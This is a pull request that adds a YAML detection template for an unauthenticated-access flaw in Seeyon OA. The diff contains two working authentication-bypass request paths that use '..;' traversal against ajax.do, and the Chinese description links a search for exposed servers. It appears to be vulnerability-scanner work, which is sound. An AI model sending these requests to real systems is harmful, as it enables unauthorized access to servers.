### PR TITLE
seeyon-unauthorized

### DIFF
--- a/pocs/seeyon-unauthorized.yml
+++ b/pocs/seeyon-unauthorized.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-seeyon-unauthorized
+rules:
+  - method: GET
+    path: /seeyon/thirdpartyController.do.css/..;/ajax.do
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
+  - method: GET
+    path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier"))
+
+detail:
+  author: x1n9Qi8
+  links:
+    - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
+    - https://buaq.net/go-53721.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
由于某远OA旧版本某些接口存在未授权访问，以及部分函数存在过滤不足，攻击者通过构造恶意请求，可在无需登录的情况下上传恶意脚本文件，从而控制服务器。
## 测试环境
https://fofa.so/result?qbase64=YXBwPSLoh7Tov5xBOCI=
## 备注